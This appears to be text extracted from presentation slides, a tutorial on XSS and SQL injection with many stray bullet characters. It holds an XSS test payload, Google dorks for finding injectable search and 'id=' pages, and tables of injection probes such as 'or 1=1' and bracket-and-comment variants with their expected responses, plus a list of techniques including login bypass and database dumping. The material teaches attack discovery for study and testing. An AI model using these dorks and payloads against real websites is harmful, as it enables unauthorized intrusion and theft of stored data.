Professional Documents
Culture Documents
About me:
l
l
Teoria
l
l
l
l
l
l
l
l
Riesgos
Conocimientos previos
Como funciona
Algunos ataques
Ejemplos
Vectores de ataque
Bypass WAF
Dorks
<script>alert(1);</script>
l
l
l
l
l
l
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
DORKS
DATABASE
l
l
l
l
l
l
l
l
l
DB servers,
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite
SQL
Structured Query Language is Known as SQL. In
order to communicate with the Database . We
are querying the database so it is called as
Query language.
l
l
l
l
l
l
l
l
l
l
l
l
http://pageweb.com/report.php?id=23
l
l
l
l
l
l
l
l
l
l
l
l
l
l
Input
l
l
l
l
l
l
l
l
l
l
l
l
l
l
l
l
l
l
Input
Reaction if its Intiger Based Bracket
enclosed Injection
23' : It should cause error or no output
" : Should cause error or no output
23 or 1=1 : Output should come but may be
different output
23 and 1=1 : Output should come but may be
different output
23 and false : No output
23 and true : Same Output
23--+ : Error or No output. Here you can
understand that any Bracket is used
l
l
l
l
l
l
l
Input
Reaction if its bracket enclosed Single
Quote based Injection
23' : It should cause error or no output
23" : No error Same output
23' or '1'='1 : Any Output should come but may
be different output
23' and '1'='1 : Any Output should come but
may be different output
23' and false--+ : No output or error
23' and true--+ : No output or error
23') and False--+ : No output
23') and true--+ : Same Output
l
l
l
l
l
l
l
Input
Reaction if its bracket enclosed Double
Quote based Injection
23' : No error Same output
23" : Error or No output
23" or "1"="1 : Any Output should come but
may be different output
23" and "1"="1 : Any Output should come but
may be different output
23" and false--+ : No output or error
23" and true--+: No output or error
23") and False--+ : No output
23") and true--+ : Same Output
[1]. Balance.
[2]. Inject.
[3]. Commenting.
l
l
l
l
l
l
l
l
l
l
l
l
l
l
ORDER BY
l
l
Query
Output
select * from students order by 1 : It will output
all the rows and sort then by the first column
which is id
select * from students order by 2 : It will output
all the rows and sort then by the second column
which is f_name
select * from students order by 3 : It will output
all the rows and sort then by the third column
which is l_name
select * from students order by 4 : It will output
all the rows and sort then by the forth column
which is roll_no
XPATH-Error-Based-Injection-Extractvalue
XPATH-Error-Based-Injection-UpdateXML
Error-Based-Injection-Subquery-Injection
Blind-SQL-Injection
bypass-login-using-sql-injection
Dump-database-from-login-form-sql
time-based-blind-injection
insert-query-injection
group-by-and-order-by-sql-injection
Union-based-Oracle-Injection
Dorks
l
l
l
l
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=